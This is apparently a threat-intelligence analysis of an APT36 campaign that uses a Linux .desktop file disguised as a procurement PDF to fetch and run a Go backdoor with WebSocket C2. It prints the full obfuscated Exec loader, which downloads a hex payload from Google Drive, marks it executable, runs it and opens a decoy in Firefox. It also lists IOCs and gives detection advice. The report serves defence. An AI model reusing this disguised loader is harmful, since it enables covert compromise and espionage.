Executive Summary

APT36 — also known as Transparent Tribe, Mythic Leopard, Earth Karkaddan, or Operation C-Major — is a Pakistan-based advanced persistent threat (APT) group active since at least 2013. The group is primarily focused on cyber-espionage activities targeting Indian government entities, with a particular emphasis on defense personnel and related organizations. APT36 is well known for its persistent phishing campaigns and credential-harvesting operations used to gain access to sensitive environments.

In our recent investigations, we observed a new infection technique leveraging Linux desktop entry (.desktop) files as a malware delivery mechanism. The attack begins with a malicious ZIP archive containing a .desktop file disguised as a document (e.g., PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf.desktop). When executed, the loader downloads a dropper payload from Google Drive, stored there as hex-encoded strings. The malware then:

1. Decodes the hex payload and writes it to /tmp/PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf-$(date +%s) (where date +%s provides a Unix timestamp).
2. Adjusts permissions and executes the dropper binary.
3. Opens a decoy PDF file in Firefox, creating the impression that a legitimate document has been accessed to reduce victim suspicion.

Once launched, the dropper performs several operations:

• Executes anti-debugging and anti-sandbox checks.
• Establishes persistence on the infected system.
• Attempts to establish a connection with its command-and-control (C2) infrastructure using WebSockets.

‍

Analysis

‍

PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf.zip : Zip file contains .desktop malware file

MD5 Hash : 6ac0fe0fa5d9af8193610d710a7da63c

SHA1 Hash : 3e3169c513c02126028480421fb341a167cb9fcd

SHA256 Hash : 34ad45374d5f5059cad65e7057ec0f3e468f00234be7c34de033093efc4dd83d

‍

After Unziping the zip file we get a .desktop file (PROCUREMENT_OF_MANPORTABLE_\&_COMPAC.pdf.desktop)

MD5 Hash : a484f85d132609a4a6b5ed65ece7d331

SHA1 Hash : 1982f09bfab3a6688bb80249a079db1a759214b7

SHA256 Hash : 6347f46d77a47b90789a1209b8f573b2529a6084f858a27d977bf23ee8a79113

‍

A .desktop file is a plain text configuration file used primarily in Linux desktop environments to define application shortcuts and launchers. It provides metadata about an application, such as its name, icon, and the command to execute the program. These files allow an application to appear in system menus, on the desktop, or in panels, facilitating easy launching from graphical user interfaces.

‍

‍

‍

The malicious code is concealed within the icon configuration.

‍

Analysis for .desktop file

1. Embedded Icon Data

# --- BEGIN EMBEDDED ICON DATA ---
# iVBORw0KGgqd1AvKicUBc7GuHI7XQwdKi/HWYzY53AMg1uzySt9pcU8vjp35LwaNYUW9Oqdg9oIc
# ... (Base64-encoded image data) ...
# --- END EMBEDDED ICON DATA ---

‍

• These lines contain an embedded icon image encoded in Base64 format.
• This icon is used by the Linux desktop environment to visually represent the .desktop file.
• Embedding the icon data helps disguise the file as a legitimate PDF document shortcut.
• The malware hides itself "between" or alongside the icon data to avoid casual detection.

‍

2.  [Desktop Entry] Header

[Desktop Entry]

• Marks the beginning of the desktop entry configuration as per the Desktop Entry Specification.
• Indicates this file defines how the desktop environment should treat this item (e.g., application shortcut).

‍

3. Name Field

Name=PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf

• The displayed name of this shortcut, designed to look like a legitimate PDF file.
• Using a plausible document name helps trick users into double-clicking.

‍

4. Exec Field

Exec=bash -c 'CTFuFt="/tmp/PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf-$(date +%s)"; niLThe="$(echo ZWFNWEpXPSItLWZhaWwgLS1sb2NhdGlvbiAtLXNob3ctZXJyb3IiOyBjdXJsICR7ZWFNWEpXfSAiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xVlFRaVR0NzhOM0twWUp6VmJFLTk1dUlMbk84NFd6Xy0iIHwgeHhkIC1yIC1w | base64 -d)"; eval "$niLThe" > "$CTFuFt" && chmod +x "$CTFuFt" && "$CTFuFt" & iuqdST="$(echo ZmlyZWZveCAtLW5ldy13aW5kb3cgImh0dHBzOi8vZHJpdmUuZ29vZ2xlLmNvbS9maWxlL2QvMWtuMExfNldZYmZVVXgwZG16d2ZBTERuemtWSEpBUFR1L3ZpZXc/dXNwPWRyaXZlX2xpbmsi | base64 -d)"; eval "$iuqdST" &'

‍

• This is the core malware execution command that runs when the .desktop file is executed.

‍

Breakdown:

‍

• CTFuFt is a variable set to a file path in /tmp/ with the original PDF name appended by a Unix timestamp to create a unique filename.

• niLThe is set by decoding a base64-encoded string, which is a hex-encoded payload. i.e niLThe stores the following command

curl --fail --location --show-error "https://drive.google.com/uc?export=download&id=1VQQiTt78N3KpYJzVbE-95uILnO84Wz_-" | xxd -r -p

‍

• This decoded payload is written to the file path $CTFuFt (/tmp dir).

• The file is then given execute permissions (chmod +x).

• The payload file is executed in the background (&).

• Another base64-decoded command is stored in iuqdST which launches Firefox, opening a decoy PDF URL to mislead the user.

firefox --new-window "https://drive.google.com/file/d/1kn0L_6WYbfUUx0dmzwfALDnzkVHJAPTu/view?usp=drive_link

‍

• Both payload execution and decoy PDF opening happen concurrently.

• Essentially, this runs a hidden malicious payload while showing a fake legitimate document to the victim.

‍

5. Terminal Field

Terminal=false

• Indicates that the command should run without opening a visible terminal window.

• Helps hide the attack execution from user view.

‍

6. Type Field

Type=Application

• Identifies this .desktop file as an application launcher.
• This field tells the system that executing this file will run an application or command rather than opening a folder or link.

‍

7. Icon Field

Icon=application-pdf

• Specifies the icon that the desktop environment should display for this file.
• Set to a generic PDF icon to further disguise the file as a document rather than an executable.

‍

8. Categories Field

Categories=Utility;

• Used by the desktop environment to categorize the application.
• Here, it is marked as a utility, presumably to avoid suspicion.

‍

9. X-GNOME-Autostart-enabled Field

X-GNOME-Autostart-enabled=true

• GNOME-specific key that marks this file to be automatically started when the user logs in.
• This could be an attempt to establish persistence by running the malicious .desktop file on every session start.

‍

10. X-AppImage-Integrate Field

X-AppImage-Integrate=false

• Prevents AppImage integration, a Linux feature related to portable apps.
• Likely irrelevant for malware but included to maintain expected desktop file structure.

11. Second Embedded Icon Data Block

# --- BEGIN EMBEDDED ICON DATA ---
# iVBORw0KGgqkmDCyTlAPgMnafl2BLX+gyT9xeiQFmRad7Yp+eSZ18TseFE3GYswghqPWxLb2pEjg
# ... (Base64-encoded image data) ...
# --- END EMBEDDED ICON DATA ---

• Another Base64-encoded icon embedded again at the end, perhaps to maintain file integrity or repel simpler detection.
• This reinforces the disguise by embedding multiple icon images.

‍

‍

Analysis for the dropped file (payload)

Payload file : ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=508a3568c56ed4f613cfafef23ff12c81ba627eb, with debug_info, not stripped

With section header analysis we can confirm this is a go binary.

MD5 Hash : 566ddd4eb4ca8d4dd67b72ee7f944055

SHA1 Hash : df4db969a69efc1db59f4d3c596ed590ee059777

SHA256 Hash : 7a946339439eb678316a124b8d700b21de919c81ee5bef33e8cb848b7183927b

‍

Reverse Engineering the go binary gives some interesting findings:

‍

1. Go Runtime & Stack Growth

• This is Go’s way of checking if there's enough stack space and growing the goroutine stack when needed.

‍

2. Randomization & Anti‑Analysis Checks

• It seeds randomness with the current time.

• Runs "dummy evasion checks" in a loop — these are anti‑debug / anti‑sandbox routines designed to waste time or detect instrumentation.

• Typical malware trick to throw off emulators and static analyzers.

‍

3. Client Creation

• This function seems to build a network "client" object for later use.

‍

4. Stealth / Persistence Modes

It branches based on os.Args:

If os.Args == "--hidden", it triggers:

(stealth install mode)

‍

Otherwise, it installs persistence (likely adding itself to cron and backup daemon):

‍

5. Logging & Announcements

There are many calls to:

log.(*Logger).output(...)
main.main.Println.funcX
main.main.Printf.funcY

Where it logs messages like:

‍

"Stealth client starting…"

"(PID: ...)"
"Attempting to connect to server: ..."

‍

6. Command & Control Behavior

The loop at the end is critical:

• That Base64 blob decodes to a WebSocket URL (ws://seemysitelive[.]store:8080/ws)
• The client continually tries to connect to it.
• If the connection fails, it logs then sleeps and retries — classic C2 (Command & Control) beaconing loop.

‍

7. Syscall Usage

• This is either doing low‑level process manipulation (possibly hiding, persistence, or privilege escalation).

‍

Attribution

The C2 we found was running a websocket which returned “Welcome to Stealth Server”. Let’s check the C2 on Censys to identify if we can gather any “Stealth Server” related artifacts.

‍

Searched for IP addresses using the following Censys query:

services.http.response.html_tags:"<title>Stealth Server - Login</title>"

Results:

• 4 IPs matched the query.
• 3 of these were identified as malicious:
• 2 are our C2 servers.
• 1 is a previously attributed C2 associated with APT36.

C2 domain: seemysitelive[.]store 

C2 IP:  164.215.103.55 (related to ASN: AS 213373 ;  IP Connect Inc )

Connecting to websocket give : "Welcome to Stealth Server"

‍

‍

‍

‍

Impact

The use of google drive in their attack lifecycle represents a significant evolution in the threat group's capabilities, introducing spearphishing vectors that pose higher risks to Linux-based government and defense infrastructure. 

Impact on Enterprises and Governments

Targeted Espionage on Critical Sectors: APT36 attacks focus on government and defense personnel, risking leakage of sensitive defense and strategic information that can compromise national security and organizational confidentiality.

Stealthy Persistence and Evasion: Using disguised .desktop files and sophisticated anti-debugging/anti-sandbox techniques, the malware persists undetected on Linux systems, allowing prolonged unauthorized access and espionage.

Supply Chain and Procurement Security Threat: The campaign uses procurement-themed phishing to infiltrate organizations, highlighting vulnerabilities in procurement workflows which can lead to operational disruption, fraud, and loss of trust.

‍

Command & Control Over Non-Standard Protocols: Utilizing WebSocket communications on port 8080, the campaign maintains stealthy remote control and exfiltration capabilities, complicating detection and incident response efforts.

‍

Indicators of Compromise (IOCs) 

File Hashes

Malicious ZIP Archive
Filename: PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf.zip
MD5:      6ac0fe0fa5d9af8193610d710a7da63c
SHA1:     3e3169c513c02126028480421fb341a167cb9fcd
SHA256:   34ad45374d5f5059cad65e7057ec0f3e468f00234be7c34de033093efc4dd83d

Malicious .desktop File
Filename: PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf.desktop
MD5:      a484f85d132609a4a6b5ed65ece7d331
SHA1:     1982f09bfab3a6688bb80249a079db1a759214b7
SHA256:   6347f46d77a47b90789a1209b8f573b2529a6084f858a27d977bf23ee8a79113

Go Binary Payload
Filename: ELF 64-bit LSB executable (dropped payload)
MD5:      566ddd4eb4ca8d4dd67b72ee7f944055
SHA1:     df4db969a69efc1db59f4d3c596ed590ee059777
SHA256:   7a946339439eb678316a124b8d700b21de919c81ee5bef33e8cb848b7183927b

‍

Network Indicators

Command & Control Infrastructure

Domain:   seemysitelive[.]store
IP:       164.215.103.55
ASN:      AS 213373 (IP Connect Inc)
Protocol: WebSocket (ws://)
Port:     8080
URL:      ws://seemysitelive[.]store:8080/ws
Banner:   "Welcome to Stealth Server"

‍

Payload Delivery Infrastructure

Platform: Google Drive

Attacker Gmail : [email protected]
URL Pattern: https://drive.google.com/uc?export=download&id=[FILE_ID]
Decoy URL: https://drive.google.com/file/d/1kn0L_6WYbfUUx0dmzwfALDnzkVHJAPTu/view?usp=drive_link

‍

File System Artifacts

Payload Drop Locations
Path Pattern: /tmp/PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf-[TIMESTAMP]
Example:      /tmp/PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf-1692547200
Permissions:  Executable (chmod +x applied)

‍

Behavioral Indicators

Process Execution Patterns
Command: bash -c [BASE64_ENCODED_COMMANDS]
Pattern: curl --fail --location --show-error [GOOGLE_DRIVE_URL] | xxd -r -p
Process: Firefox launch with decoy PDF URL
Binary:  Go executable with anti-debugging features

‍

Network Communication Patterns

Protocol:     WebSocket connections to port 8080
Retry Logic:  10-second intervals on connection failure
User-Agent:   Go HTTP client patterns
Persistence:  Continuous reconnection attempts

‍

Remediation Recommendations

Network Security

• Block C2 Infrastructure
• Add seemysitelive[.]store and 164.215.103.55 to network blocklists
• Monitor and block WebSocket connections to port 8080
• Implement DNS sinkholing for the malicious domain

‍

Endpoint Detection

• Search for file hashes across all Linux systems
• Hunt for files in /tmp/ matching the naming pattern
• Identify systems with suspicious .desktop files

‍

Email Security

• Block ZIP attachments containing .desktop files
• Implement additional scanning for procurement-themed emails
• Review email logs for similar attachment patterns

‍

Hunt Operations

1. Threat Hunting Queries

# Search for suspicious .desktop files
  find / -name "*.desktop" -newer [recent_date] -exec grep -l "bash -c" {} \;
 
  # Look for hex-decoded payloads
  grep -r "xxd -r -p" /var/log/
 
  # Find Go binaries in suspicious locations
  find /tmp /var/tmp -type f -executable -exec file {} \; | grep "Go building"

‍

2. Memory Analysis

   - Dump memory of suspicious Go processes

   - Analyze WebSocket connections in memory

   - Check for embedded configuration data

‍

Appendix

Reference

https://x.com/SinghSoodeep/status/1955860231109665108

‍